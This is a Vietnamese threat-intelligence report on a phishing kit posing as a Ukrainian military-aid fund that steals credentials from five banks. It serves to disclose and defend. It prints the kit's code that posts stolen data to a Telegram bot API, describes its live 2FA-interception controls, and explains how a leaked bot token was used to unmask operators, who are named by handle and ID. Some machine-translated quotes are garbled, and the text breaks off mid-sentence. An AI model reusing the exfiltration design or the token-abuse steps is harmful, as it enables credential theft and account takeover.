Quay lại trang Tin tức
Mối đe dọa đang diễn ra — Báo cáo điều tra

Mạng lưới lừa đảo nhằm chiếm đoạt viện trợ quân sự bị phanh phui: 5 ngân hàng bị nhắm mục tiêu, các đối tượng thực hiện đã được xác định

Pipeline tự động của PhishDestroy đã phân tích chi tiết một chiến dịch lừa đảo mạo danh một quỹ hỗ trợ quân sự của Ukraine — từ việc đăng ký tên miền cho đến việc xác định danh tính kẻ điều hành — chỉ trong vài phút.

Ngày 25 tháng 3 năm 2026 Nghiên cứu PhishDestroy Thời gian đọc: 12 phút
Ảnh chụp màn hình 1 — Tổng quan về cuộc điều tra: Mạng lưới lừa đảo dopomogvoina[.]sbs nhắm vào các cựu quân nhân Ukraine.
5
Các ngân hàng bị nhắm mục tiêu
3
Các nhà khai thác đã được xác định
6
Các lệnh gọi API để gỡ ẩn danh
2
Các dự án lừa đảo song song
<30
Chỉ mất vài phút để hoàn tất phân tích
Thông báo về nhà tài trợ(nhấp vào để mở rộng)
Xin giới thiệu nhà tài trợ chính thức của cuộc điều tra này
🏆 Công ty TNHH Tập đoàn Quốc tế NiceNIC 🏆
Điều quan trọng nhất có thẩm quyền cơ quan đăng ký đó hợp tác với Netcraft (bằng cách lừa hệ thống của họ) · Nhà cung cấp tên miền chính thức cho Thị trường ma túy Kraken · Nhà cung cấp chương trình giảm giá khi mua số lượng lớn · Người hâm mộ trung thành của "Kẻ lừa đảo điển hình" Cộng đồng VK — nhưng vẫn chưa mua khóa học về ẩn danh
⭐ 1.8
Trustpilot
Đánh giá
$200
Giá .ru
120₽ thực
0
Báo cáo về hành vi lạm dụng
đã thực hiện
15,000%
Miền
đánh dấu
  • Mặc dù tự xưng là người “Trung Quốc” (Hồng Kông), nhưng tác giả lại đến từ Gorlovka, Cộng hòa Nhân dân Donetsk. Việc in logo bằng tiếng Trung chỉ mang tính trang trí — giống như Điều khoản Dịch vụ của họ
  • Duy trì Hỗ trợ tiếng Nga thông qua VKontakte và Telegram, bán .ru với giá 200 đô la khi reg.ru tính phí 120₽ (~$1.30)
  • Các đánh giá tiêu cực trên Trustpilot đề cập đến các tên miền liên quan đến thị trường ma túy biến mất một cách bí ẩn. Có phải là sự trùng hợp ngẫu nhiên không? Chắc chắn là không
  • Một người đăng ký đang hoạt động của "Kẻ lừa đảo điển hình" (Kẻ lừa đảo điển hình) Cộng đồng VK — khi nhà đăng ký tên miền của bạn theo dõi các nhóm lừa đảo, bạn sẽ biết đối tượng mục tiêu của họ là ai
  • Hợp tác với Netcraft vừa đủ để tránh bị gỡ khỏi danh sách, đồng thời vẫn duy trì cơ sở hạ tầng cho các tên miền liên quan đến lừa đảo, cờ bạc và ma túy

Trong khi đó, trong chương trình “Типичный Мошенник”:

Bản gốc (tiếng Nga)
Đã dịch (tiếng Anh)
Lời hứa dành cho nhà tài trợ của chúng tôi: Khi bài đăng này từ "Типичный Мошенник" trở thành hiện thực — và dựa trên những gì chúng ta biết, đó chỉ là vấn đề của khi, không phải nếu — Toàn bộ đội ngũ của chúng tôi sẽ đăng ký tài khoản trên VKontakte và theo dõi cộng đồng này. Hãy coi đó là lời tán dương nồng nhiệt của chúng tôi. 👏

* Đây là một bài viết châm biếm. NiceNIC không tài trợ cho cuộc điều tra này. Tuy nhiên, chính việc họ từ chối xử lý các báo cáo lạm dụng của chúng tôi trong hơn 5 ngày đã khiến cuộc điều tra này trở nên cần thiết. Mọi nội dung nêu trên đều dựa trên thông tin công khai và kinh nghiệm hoạt động của chúng tôi. Đọc bài phân tích chi tiết về NiceNIC của chúng tôi →

Những gì PhishDestroy đã phát hiện

Vào ngày 20 tháng 3 năm 2026, Pipeline phát hiện mối đe dọa tự động của PhishDestroy đã phát hiện dopomogvoina[.]sbs — một tên miền vừa được đăng ký, đang lưu trữ một trang web lừa đảo mạo danh "Tấm khiên của Người bảo vệ" (Shield of the Defender), một tổ chức viện trợ quân sự giả mạo của Ukraine. Trang web này nhắm vào các cựu chiến binh Ukraine, những người bị thương trong chiến đấu và gia đình các chiến sĩ đã hy sinh, hứa hẹn sẽ cung cấp hỗ trợ tài chính từ chính phủ trong khi thực chất là đánh cắp thông tin đăng nhập ngân hàng của năm ngân hàng lớn nhất Ukraine.

Dưới đây là phân tích chi tiết toàn diện về tất cả những gì mà quá trình phân tích tự động của chúng tôi đã phát hiện ra: các thủ đoạn thao túng tâm lý, cơ sở hạ tầng kỹ thuật, hệ thống điều khiển thời gian thực của người vận hành, cũng như danh tính của những người đứng sau hệ thống này.

Đánh giá tác động
Trang web này đặc biệt hướng đến những đối tượng dễ bị tổn thương nhất: các cựu chiến binh mắc chứng rối loạn căng thẳng sau chấn thương tâm lý (PTSD), gia đình các chiến sĩ hy sinh đang tìm kiếm sự hỗ trợ từ chính phủ, và các quân nhân bị thương đang phải đối mặt với hệ thống hành chính phức tạp. Mỗi thông tin đăng nhập bị đánh cắp đều có thể dẫn đến việc tài khoản bị chiếm quyền kiểm soát hoàn toàn chỉ trong vài phút.

Phần 1: Mồi nhử — Quỹ viện trợ quân sự giả mạo

Tên miền dopomogvoina[.]sbs đã được đăng ký vào ngày 20 tháng 3 năm 2026 thông qua Công ty TNHH Tập đoàn Quốc tế NiceNIC, một cơ quan đăng ký có lịch sử đã được ghi nhận rõ ràng về việc phản ứng chậm chạp hoặc hoàn toàn không phản ứng trước các trường hợp lạm dụng. Cơ quan này .sbs TLD (Side-By-Side) là một tên miền cấp cao chung (gTLD) có chi phí thấp, thường bị lợi dụng để xây dựng cơ sở hạ tầng lừa đảo dùng một lần.

Trang web này tự giới thiệu là một cổng thông tin hỗ trợ chuyên nghiệp có liên kết với chính phủ. Lá cờ Ukraine chiếm trọn phần đầu trang, các hình ảnh quân sự góp phần tạo nên sự chân thực, và nội dung trang được soạn thảo cẩn thận bằng tiếng Ukraine với cách diễn đạt mang tính hành chính, giống hệt các chương trình chính thức của chính phủ.

Trang chủ của trang web lừa đảo dopomogvoina hiển thị thông tin giả mạo về một quỹ viện trợ quân sự
Ảnh chụp màn hình 5 — Trang đích của trang web lừa đảo mạo danh "Щит Захисника" (Lá chắn của Người bảo vệ).

Để tạo dựng uy tín, các nhà điều hành đã bịa ra một bộ đếm thống kê và hiển thị nó ở vị trí nổi bật trên trang đích:

  • 2.847 đơn đăng ký — điều này ngụ ý rằng hàng nghìn người đã nhận được viện trợ
  • Đã phân phối ₴47,2 triệu — một con số lớn nhưng vẫn hợp lý tại UAH
  • 19 chương trình — cho thấy đây là một chiến dịch toàn diện, bao gồm nhiều chương trình

Những con số này hoàn toàn là số bịa đặt, được mã hóa cứng trực tiếp vào mã nguồn trang web mà không có bất kỳ kết nối nào với hệ thống phía sau. Chúng chỉ phục vụ một mục đích duy nhất: tạo ra bằng chứng xã hội để xóa tan sự do dự của nạn nhân.

Phần 2: Cái bẫy — 5 ngân hàng, một mục tiêu

Sau khi nhấp vào “Подати заявку” (Gửi đơn đăng ký), nạn nhân sẽ được chuyển đến màn hình chọn ngân hàng. Năm ngân hàng bán lẻ lớn nhất Ukraine xuất hiện dưới dạng các tùy chọn, mỗi ngân hàng đều có thương hiệu và logo chính thức. Đây chính là lúc thủ đoạn lừa đảo chuyển từ việc thao túng cảm xúc sang hành vi trộm cắp kỹ thuật.

Màn hình chọn ngân hàng hiển thị 5 ngân hàng của Ukraine
Ảnh chụp màn hình 6 — Màn hình chọn ngân hàng. Mỗi tùy chọn sẽ dẫn đến một chuỗi hành động đánh cắp thông tin đăng nhập được tùy chỉnh.

Việc phân tích gói JavaScript của trang web cho thấy mỗi ngân hàng có một chuỗi thu thập thông tin đăng nhập độc đáo gồm nhiều bước, được thiết kế phù hợp với quy trình xác thực thực tế của ngân hàng đó:

PrivatBank

Đăng nhậpMật khẩuMã PINTin nhắn SMS

monobank

Đăng nhậpMã PINTin nhắn SMSEmail

Oschadbank

Đăng nhậpXác minhTin nhắn SMS

PUMB

Đăng nhậpTin nhắn SMS

Ngân hàng Ukrsibbank

Đăng nhậpMã PINTin nhắn SMS

Quy trình tấn công đối với mọi ngân hàng đều tuân theo cùng một mô hình:

Trang viện trợ giả mạo
Lựa chọn ngân hàng
Bản sao trang đăng nhập
Chặn xác thực hai yếu tố (2FA)
Chiếm quyền kiểm soát tài khoản
Trang đăng nhập giả mạo của PrivatBank
Ảnh chụp màn hình 7 — Trang đăng nhập PrivatBank bị sao chép.
Trang đăng nhập PUMB giả mạo
Ảnh chụp màn hình 9 — Trang đăng nhập PUMB được sao chép.
Sơ đồ quy trình tấn công minh họa các giai đoạn lừa đảo qua email, từ trang web giả mạo về viện trợ đến việc chiếm quyền kiểm soát tài khoản
Ảnh chụp màn hình 10 — Toàn bộ quy trình tấn công: từ trang web giả mạo về viện trợ quân sự, qua việc chọn ngân hàng, cho đến việc đánh cắp thông tin đăng nhập và chiếm quyền kiểm soát tài khoản.

Hệ thống công nghệ: Ứng dụng đơn trang (SPA) React giao diện người dùng được cung cấp qua CDN Cloudflare, với một Express.js phần backend xử lý việc đánh cắp thông tin đăng nhập. Kiến trúc React cho phép tạo ra các biểu mẫu nhiều bước liền mạch, trông không khác gì các giao diện ngân hàng chính thức.

Phần 3: Điều khiển thời gian thực của người vận hành

Đây không phải là một công cụ thu thập thông tin đăng nhập đơn thuần với cơ sở dữ liệu tĩnh. Bộ công cụ lừa đảo này bao gồm một Bảng điều khiển WebSocket trực tiếp cho phép người vận hành can thiệp vào từng phiên làm việc của nạn nhân theo thời gian thực.

Điểm cuối WebSocket tại wss://dopomogvoina[.]sbs/ws hỗ trợ các loại tin nhắn sau:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Chức năng điều khiển thời gian thực này cho phép người vận hành:

  • Buộc chuyển sang trạng thái chờ — hiển thị thông báo “Đang xử lý yêu cầu của bạn...” trong khi chúng đăng nhập vào tài khoản ngân hàng thực sự của nạn nhân
  • Chuyển hướng đến một bước cụ thể — Yêu cầu lại mã SMS nếu mã đầu tiên đã hết hạn
  • Hiển thị các thông báo lỗi giả — “Mã không hợp lệ, vui lòng nhập lại” để thu thập nhiều mã xác thực hai yếu tố (2FA)
  • Đặt câu hỏi tùy chỉnh — yêu cầu cung cấp ngày sinh, số thẻ hoặc bất kỳ thông tin bổ sung nào trong quá trình sử dụng dịch vụ
Điều gì khiến điều này trở nên nguy hiểm
Việc điều khiển theo thời gian thực của kẻ tấn công có thể vô hiệu hóa các biện pháp bảo mật 2FA dựa trên thời gian. Kẻ tấn công chặn mã SMS và sử dụng mã đó trong khoảng thời gian hiệu lực — thường từ 30 đến 120 giây — trong khi nạn nhân chỉ biết nhìn chằm chằm vào hình ảnh động giả mạo với thông báo “đang xử lý”.
Mẫu nhập số điện thoại trên trang đăng nhập ngân hàng giả mạo
Ảnh chụp màn hình 8 — Biểu mẫu nhập số điện thoại được sử dụng để thực hiện hành vi đánh cắp thông tin đăng nhập.
Bảng điều khiển dành cho người vận hành dựa trên WebSocket
Ảnh chụp màn hình 11 — Bảng điều khiển bot thời gian thực của kẻ tấn công để kiểm soát các phiên làm việc của nạn nhân.

Toàn bộ dữ liệu bị đánh cắp trong mỗi phiên: phone, password, PIN, SMS code, card number, date of birth, và email.

Phần 4: Phía sau Cloudflare — Hai dự án, một máy chủ

Dịch vụ proxy của Cloudflare che giấu máy chủ gốc, nhưng Pipeline phân tích hạ tầng của PhishDestroy đã xác định được địa chỉ IP gốc thực sự: 45.131.214[.]148, được đăng tải tại RapidSeedbox / LeaseWeb tại Hà Lan.

Một chi tiết quan trọng: dopomogvoina[.]sbs được chuyển tiếp qua Cloudflare, che giấu địa chỉ IP nguồn của nó. Tuy nhiên, hệ thống của chúng tôi cũng theo dõi hlpforvpeople[.]sbs — một tên miền có liên quan được đăng ký qua cùng một nhà đăng ký NiceNIC với các mẫu trùng khớp. Tên miền đó là KHÔNG nằm phía sau Cloudflare, để lộ trực tiếp địa chỉ IP nguồn của nó: 45.131.214[.]148.

Kết nối trực tiếp đến địa chỉ IP này — mà không cần qua Host tiêu đề — đã hé lộ một điều bất ngờ: một một trang web lừa đảo hoàn toàn khác. Thay vì viện trợ quân sự cho Ukraine, máy chủ ảo mặc định đã phục vụ "Thẻ bảo hiểm y tế", một chiến dịch lừa đảo qua email nhằm vào bảo hiểm y tế ở Indonesia. Cùng một máy chủ, nhưng nạn nhân hoàn toàn khác nhau, và quốc gia cũng hoàn toàn khác.

Cùng một máy chủ, cùng một nhóm hacker, nhưng các nạn nhân khác nhau
  • Dự án 1: Viện trợ quân sự cho Ukraine → đánh cắp thông tin đăng nhập tài khoản ngân hàng của các cựu chiến binh
  • Dự án 2: Bảo hiểm y tế Indonesia → đánh cắp thông tin đăng nhập dịch vụ y tế của công dân
  • Cùng một bộ công cụ Express.js, cùng một bảng điều khiển thời gian thực WebSocket
  • Giao diện quản lý máy chủ BT-Panel (宝塔) tương tự
  • Miền C2 của dự án thứ hai: rezervtemka[.]cc — một bảng điều khiển lừa đảo đã được xác định trong cơ sở dữ liệu mối đe dọa của PhishDestroy
  • Các bình luận bằng tiếng Nga trong mã nguồn của dự án Indonesia cũng xác nhận rằng các nhà phát triển này đều thuộc CIS
Hai dự án lừa đảo đang hoạt động trên cùng một máy chủ — viện trợ quân sự cho Ukraine và bảo hiểm y tế Indonesia
Ảnh chụp màn hình 12 — Hai chiến dịch lừa đảo song song sử dụng chung một máy chủ nguồn: viện trợ quân sự Ukraine (dopomogvoina) và bảo hiểm y tế Indonesia (HealthCare ID).

Mẫu lừa đảo của Indonesia là một bộ công cụ đã biết được theo dõi trong cơ sở dữ liệu tình báo mối đe dọa của PhishDestroy. Chúng tôi đã ghi nhận các biến thể của chính mẫu này được triển khai trên khắp Đông Nam Á — nhắm vào các tổ chức tài chính của Indonesia, Thái Lan và Việt Nam. Những kẻ điều hành chỉ cần thay thế các mẫu dành riêng cho từng quốc gia trong khi vẫn tái sử dụng cùng một hạ tầng nền tảng.

Những tên tội phạm không phân biệt đối tượng
Đây là thực trạng của các hoạt động lừa đảo trực tuyến hiện đại: những kẻ lừa đảo chẳng quan tâm đến việc chúng lừa đảo ai. Các cựu chiến binh Ukraine tìm kiếm viện trợ quân sự, người lao động Indonesia mua bảo hiểm y tế — đối tượng mục tiêu thay đổi tùy theo mẫu nào mang lại doanh thu cao nhất. Chính những kẻ điều hành nói tiếng Nga này vận hành cả hai chiến dịch cùng lúc từ cùng một máy chủ, chuyển đổi giữa các nạn nhân ở các quốc gia khác nhau như việc chuyển kênh truyền hình. Hôm nay là các ngân hàng Ukraine. Ngày mai có thể là các ngân hàng Israel — như Bonya đã hỏi từ tháng 3 năm 2026.

Phần 5: Tệp config.json đã phơi bày tất cả

Dưới đây là cách mà chỉ một tệp bị cấu hình sai đã khiến toàn bộ hoạt động bị đổ vỡ — từng bước một.

Sau khi xác định được dự án thứ hai của máy chủ nguồn, PhishDestroy’s Trình phân tích JS — công cụ phân tích JavaScript tự động của chúng tôi — đã được hướng đến gói mã của trang web lừa đảo Indonesia tại https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Công cụ phân tích đã trích xuất tất cả các điểm cuối API, các URL bên ngoài và các đường dẫn cấu hình từ tệp JavaScript có dung lượng 335KB. Trong số các phát hiện có:

  • Năm điểm cuối API tại rezervtemka[.]cc — Bảng điều khiển C2 để xác minh thông tin xác thực
  • Kết nối WebSocket đến wss://rezervtemka[.]cc
  • Tích hợp Facebook Pixel để theo dõi nạn nhân
  • Một tham chiếu đến /config.json — được tải trong quá trình chạy để cấu hình bot Telegram

Dựa trên manh mối này, chúng tôi đã truy xuất /config.json từ địa chỉ IP nguồn. Tệp này có thể truy cập mà không cần xác thực — nằm trong thư mục gốc của trang web, ai cũng có thể đọc được:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Cái /config.json Tệp này có thể truy cập trực tiếp từ địa chỉ IP nguồn — không có xác thực, không có kiểm soát truy cập, chỉ là một tệp JSON thuần túy nằm trong thư mục gốc của trang web:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Token của bot Telegram vừa là tên người dùng vừa là mật khẩu. Bất kỳ ai sở hữu token này đều có thể thực hiện các lệnh gọi API dưới danh nghĩa bot đó. Các quản trị viên đã để token của họ trong một tệp tin có thể truy cập công khai. Sau sáu lần gọi API, chúng tôi đã có đầy đủ mọi thứ:

getMe — Tên tài khoản bot: "MonettiCRM" (@MonettiCRM_bot)
getChat(chat_id) — Tên nhóm: "Idr card" kèm theo liên kết mời đang hoạt động
lấy danh sách các quản trị viên chat — 3 quản trị viên, bao gồm cả người tạo nhóm
getChat(creator_id) — Tác giả: @monettiescobar, Telegram Premium, hồ sơ doanh nghiệp, múi giờ UTC+3
getChat(admin2_id) — Quản trị viên thứ hai: hồ sơ trống, nghi là tài khoản phụ
lấy số lượng thành viên trong cuộc trò chuyện — Tổng cộng có 5 thành viên trong nhóm điều hành
Chuỗi OSINT cho thấy 6 lần gọi API Telegram từ tệp config.json để xác định đầy đủ danh tính của người vận hành
Ảnh chụp màn hình 13 — Chuỗi OSINT hoàn chỉnh: từ tệp config.json bị rò rỉ đến việc xác định đầy đủ danh tính người vận hành chỉ qua 6 lần gọi API.

Chỉ từ một tệp bị cấu hình sai đến việc xác định đầy đủ danh tính của người vận hành chỉ trong sáu yêu cầu HTTP. Không có lỗ hổng khai thác, không có truy cập trái phép — chỉ là các lệnh gọi API tiêu chuẩn của Telegram Bot sử dụng mã thông báo mà chính những người vận hành đã để lộ.

Phần 6: Các toán tử

Một vài suy nghĩ về sự sáng tạo trong lĩnh vực hình sự

Phần tiếp theo đây là một bài học điển hình về những lựa chọn tên gọi tồi tệ. Chúng ta có MONETTI ESCOBAR — bởi chẳng có gì thể hiện sự “kín đáo” hơn việc đặt tên mình theo tên trùm ma túy nổi tiếng nhất trong lịch sử. Rồi còn có Bonya, còn được gọi là PapaZakonVor (nghĩa đen là “Bố-Kẻ-Trộm-theo-Luật” — một cách ám chỉ nửa đùa nửa thật đến hệ thống cấp bậc trong giới tội phạm Nga), Boa, và bubullikk. Và cuối cùng Devoys, người có biệt danh là @devosus Nghe có vẻ đáng ngờ, giống như “dev ops us” — một lập trình viên đã đưa chức danh công việc của mình vào tên người dùng. Đây chính là những người đã nghĩ rằng họ có thể qua mặt được hệ thống tình báo mối đe dọa tự động. Tiết lộ trước: họ đã không thể.

Nhóm điều hành Telegram “Idr card” bị phơi bày thông qua mã thông báo bot
Ảnh chụp màn hình 14 — Nhóm quản trị viên Telegram “Idr card”, bị phơi bày thông qua mã thông báo bot bị rò rỉ.
Ảnh đại diện Telegram của MONETTI ESCOBAR
Chủ sở hữu / Người sáng lập
MONETTI ESCOBAR
@monettiescobar
ID Telegram: 8135223234
Telegram Premium, Hồ sơ doanh nghiệp
Múi giờ: UTC+3 (khu vực CIS)
10 tin nhắn công khai — tuân thủ nghiêm ngặt quy tắc bảo mật hoạt động (OPSEC)
TraFFeeQ ChatMedusa Google AdsKênh Deepfakes
Ảnh đại diện Telegram của Bonya
Nhân viên điều hành / Điều phối giao thông
Bonya
@BoaCC159
ID Telegram: 6242202706
Còn gọi là: PapaZakonVor, Boa, bubullikk
261 tin nhắn trong 12 nhóm
DC2 — Amsterdam, Hà Lan
CryptoGrabThị trường STYXRaven CCEMPIRE CHATGiải pháp Phoenix
Nhà phát triển / Lập trình viên
Devoys
@devosus
ID Telegram: 8213612730
Nhà phát triển bộ công cụ lừa đảo — những người vận hành gọi anh ta là “coder”
Khi phát hiện sự cố xâm nhập, được yêu cầu “xem xét các biện pháp phòng thủ”
Thiết kế nhằm giảm thiểu tác động đến môi trường
Tay cầm @devosus ≈ "dev ops us" — tên chức danh làm tên người dùng
Nhà phát triển bộ công cụCơ sở hạ tầngBảo mật

MONETTI ESCOBAR — Ông chủ

MONETTI duy trì các biện pháp bảo mật hoạt động nghiêm ngặt — chỉ 10 tin nhắn công khai trên 2 nhóm. Nhưng chính các nhóm này đã nói lên điều đó: TraFFeeQ Chat (lợi dụng chênh lệch lưu lượng truy cập để thực hiện hành vi gian lận), Medusa Google Ads (quảng cáo Google Ads theo phương pháp black-hat), và một Kênh Deepfakes. Trên hồ sơ kinh doanh Telegram của anh ấy có ghi “Есть предложение” ("Có một đề xuất") — quảng cáo công khai các dịch vụ. Múi giờ UTC+3 (tương ứng với Moscow/Minsk/Kyiv) và giờ làm việc 24/7 cho thấy đây là một hoạt động có trụ sở tại Cộng đồng Các Quốc gia Độc lập (CIS) và hoạt động liên tục suốt ngày đêm.

Bonya — Kẻ bất cẩn

Khác với chính sách bảo mật hoạt động (OPSEC) cẩn trọng của MONETTI, Bonya (tên mã trước đây: PapaZakonVor — tạm dịch là “DaddyThiefByLaw”) đã để lại một lượng lớn dấu vết kỹ thuật số — 261 tin nhắn trên 12 nhóm ngầm. Lịch sử trò chuyện của anh ta đọc lên như một bản lý lịch tội phạm:

Lời của chính Bonya (dịch từ tiếng Nga)
  • "các loại cá chịu dòng điện 2,0""Chỉ là lừa đảo [bảo mật ngân hàng] phiên bản 2.0" — thảo luận về khả năng tương thích của bộ công cụ lừa đảo với các hệ thống bảo mật ngân hàng mới hơn
  • "Rất khó để tìm được những món đồ rơi tốt""Rất khó để tìm được những người vận chuyển tiền giỏi" — tìm kiếm đồng phạm để rút tiền mặt
  • "Hãy đến trung tâm văn hóa làm việc cùng tôi nào""Hãy đến làm việc tại trung tâm chăm sóc khách hàng của tôi" — tuyển dụng nhân viên vận hành
  • "Có ai ở đây từng làm việc với các ngân hàng của Israel không?""Có ai ở đây từng làm việc với các ngân hàng Israel không?" — mở rộng sang các mục tiêu mới (tháng 3 năm 2026)
  • "Tôi không thấy có logo nào trên chiếc xe đó cả""Không thấy nhiều bản ghi về tài chính" — thảo luận về chất lượng thông tin đăng nhập bị đánh cắp
  • "Nếu 1 máy chủ proxy thì 1-2 dải tần số""Một đại diện chỉ cho 1-2 ngân hàng" — thảo luận về an ninh hoạt động trong lĩnh vực gian lận ngân hàng
  • "Thẻ của cô ấy bị máy ATM kẹt lại""Thẻ của cô ấy bị máy ATM nuốt mất rồi" — một kẻ rửa tiền đã lừa lấy ₴60.000 của họ, với lý do máy ATM đã nuốt thẻ. Ngay cả bọn tội phạm cũng có thể bị chính đồng bọn của mình lừa gạt.

Các tổ chức mà anh ấy tham gia đã vẽ nên một bức tranh toàn cảnh: CryptoGrab (những kẻ đánh cắp tiền từ ví tiền điện tử), Thị trường STYX (thị trường ngầm buôn bán dữ liệu bị đánh cắp), Trình kiểm tra Raven CC (các công cụ xác thực thẻ tín dụng), EMPIRE CHATGiải pháp Phoenix (điều phối các hành vi gian lận). Đây không phải là một kẻ phạm tội lần đầu — đây là một người đã ăn sâu vào hệ sinh thái tội phạm mạng.

Devoys — Nhà phát triển

Xương sống kỹ thuật của chiến dịch. Được thiết kế để giảm thiểu tối đa sự hiện diện công khai — khi nhóm bị xâm nhập, Bonya đã trực tiếp gọi anh ta: "@devosus, hãy nghĩ cách tự vệ đi trước khi bọn chúng xé nát mông tụi mình""@devosus, hãy nghĩ đến việc phòng thủ trước khi tụi mình bị đánh tơi tả." Phản ứng mỉa mai của anh ta trước vụ vi phạm — "khi vào Interpol" ("Khi nào nên thực hiện nội suy") — cho thấy đây không phải là lần đầu tiên họ suýt gặp nguy hiểm.

Phân tích hành vi: Giải mã 261 thông điệp

Pipeline OSINT của PhishDestroy đã thu thập và dịch tất cả 261 bài đăng công khai từ Bonya qua 12 nhóm Telegram ngầm (tháng 6 năm 2024 — tháng 3 năm 2026). Dịch tự động qua API DeepL và được chỉnh sửa thủ công dựa trên ngữ cảnh. Các tin nhắn này hé lộ một hồ sơ hoạt động đầy đủ — được phân loại theo loại hình hoạt động tội phạm như dưới đây.

Phân phối tin nhắn: 261 tin nhắn trên 12 nhóm
  • 💬ONE|Trò chuyện — 91 tin nhắn (phối hợp chống lừa đảo)
  • Tin tức/Xác minh — 37 tin nhắn (lừa đảo xác minh)
  • Rolex | Phòng chat chung — 28 tin nhắn (carding)
  • EMPIRE CHAT — 24 tin nhắn (thị trường chợ đen)
  • Фбстор — 23 tin nhắn (giao dịch chênh lệch giá)
  • FB-DOC — 22 tin nhắn (gian lận quảng cáo)
  • Giải pháp Phoenix — 17 tin nhắn (lừa đảo ngân hàng)
  • CryptoGrab — 11 tin nhắn (rút tiền điện tử)
  • Thị trường STYX — 2 tin nhắn (thị trường ngầm)
  • Trình kiểm tra Raven CC — 2 tin nhắn (kiểm tra thẻ)

Gian lận ngân hàng và lừa đảo qua email

💬ONE|Trò chuyệnTháng 3 năm 2025
"Ở đây chỉ có 2,0 phish thôi"
Và ở đây là các chip có dòng điện 2,0
Thảo luận về khả năng tương thích của bộ công cụ lừa đảo (phishing kit) với các giao thức bảo mật mới nhất của ngân hàng
💬ONE|Trò chuyệnTháng 3 năm 2025
"Anh ơi, ở đây họ chẳng bán gì trên Phish cả, Phish chỉ dùng để thanh toán thôi."
Anh ơi, ở đây không bán gì bằng thẻ cả, ở đây chỉ dùng thẻ để thanh toán thôi
Phân biệt giữa lừa đảo để bán thông tin và lừa đảo để đánh cắp trực tiếp
Giải pháp PhoenixTháng 3 năm 2026
"Có ai ở đây từng làm việc với các ngân hàng ở Israel không?"
Có ai ở đây từng làm việc với các ngân hàng của Israel không?
Mở rộng hoạt động sang lĩnh vực ngân hàng Israel — 5 ngày trước khi cuộc điều tra của chúng tôi diễn ra
Rolex | Phòng chat chungTháng 9 năm 2024
"Nếu chỉ có 1 đại diện, thì chỉ có 1-2 ngân hàng"
Nếu 1 proxy tương ứng với 1-2 ngân hàng điện
An ninh vận hành trong các vụ lừa đảo liên quan đến nhiều ngân hàng: sử dụng một đại diện cho mỗi 1-2 ngân hàng để tránh bị phát hiện
Rolex | Phòng chat chungTháng 9 năm 2024
"Không thấy có nhiều thông tin về nhật ký tài chính"
Tôi không thấy có logo nào trên chiếc Finke cả
Phàn nàn về chất lượng thông tin đăng nhập ngân hàng bị đánh cắp trên các thị trường ngầm

Người vận chuyển tiền & Rút tiền mặt

💬ONE|Trò chuyệnTháng 3 năm 2025
"Những giọt nước ngon thật khó tìm"
Cũng khó mà tìm được những món đồ rơi tốt
"Drops" = những kẻ trung gian rửa tiền, chuyên rút tiền mặt từ các khoản tiền bị đánh cắp. Họ đang phàn nàn về việc khó tuyển dụng.
💬ONE|Trò chuyệnTháng 3 năm 2025
"Hãy đến làm việc tại trung tâm chăm sóc khách hàng của tôi"
Hãy đến trung tâm văn hóa làm việc cùng tôi
Tích cực tuyển dụng nhân viên cho hoạt động của một trung tâm cuộc gọi lừa đảo
Tin tức mới nhấtTháng 6 năm 2024
"Chúng tôi bị mất 60 grand"
Họ đã lấy cắp 60k của chúng tôi
Một kẻ vận chuyển tiền đã đánh cắp ₴60.000 ngay từ chính những kẻ lừa đảo. Một sự trừng phạt đầy trớ trêu.
Tin tức mới nhấtTháng 6 năm 2024
"Làm sao mà cái máy ATM lại nuốt mất thẻ được chứ?"
Làm sao mà cái máy ATM khốn kiếp đó lại nuốt mất thẻ được chứ
Kẻ trung gian này cho rằng máy ATM đã “nuốt” thẻ để giữ số tiền bị đánh cắp. Kẻ lừa đảo lại đi lừa đảo kẻ lừa đảo.
Tin tức mới nhấtTháng 6 năm 2024
"Cô ấy đã chuyển số tiền đó cho chúng tôi, nhưng sau đó chúng tôi lại không có kênh chuyển tiền chính để chuyển số tiền đó đi"
Cô ấy đã chuyển khoản đó sang cho chúng tôi, nhưng lúc đó chúng tôi lại không có tài khoản chính để chuyển tiền
Mô tả chuỗi rút tiền: nạn nhân → tài khoản trung gian → người chuyển tiền chính

Gian lận lưu lượng truy cập và lạm dụng quảng cáo

EMPIRE CHATTháng 3 năm 2026
"Tôi không dùng Google, chỉ dùng Facebook thôi"
À, tôi không dùng Google, chỉ dùng Facebook thôi.
Chuyên về gian lận quảng cáo trên Facebook — dẫn lưu lượng truy cập đến các trang lừa đảo
FB-DOCTháng 2 năm 2026
"Tôi cũng sẽ không chi % ngân sách quảng cáo nếu không có bên bảo lãnh đâu"
Tôi cũng sẽ không nạp tiền theo tỷ lệ phần trăm trên tổng chi tiêu nếu không có người bảo lãnh
Đàm phán các điều khoản thanh toán cho việc triển khai các chiến dịch quảng cáo gian lận trên Facebook
CryptoGrabTháng 1 năm 2025
"Tôi đã thử dùng AML trên Facebook để nhắm mục tiêu vào thị trường Mỹ — nhưng không tìm thấy bất kỳ cách thiết lập nào hiệu quả trên mạng"
Tôi đã thử tìm kiếm thông tin về AML trên Facebook nhưng cũng không tìm thấy bất kỳ nguồn tin đáng tin cậy nào, kể cả những nguồn cũ, trên mạng.
Cố gắng sử dụng quảng cáo trên Facebook để thực hiện các chiêu trò lừa đảo nhằm chống rửa tiền, nhắm vào các nạn nhân tại Mỹ
Hồ sơ tâm lý: Bonya

Bộ dữ liệu gồm 261 tin nhắn cho thấy một tội phạm mạng cấp trung với các hoạt động đa dạng: lừa đảo qua ngân hàng, mạng lưới “vận chuyển tiền bất hợp pháp”, gian lận quảng cáo trên Facebook, đánh cắp tiền điện tử và kiểm tra thẻ tín dụng. Các đặc điểm chính:

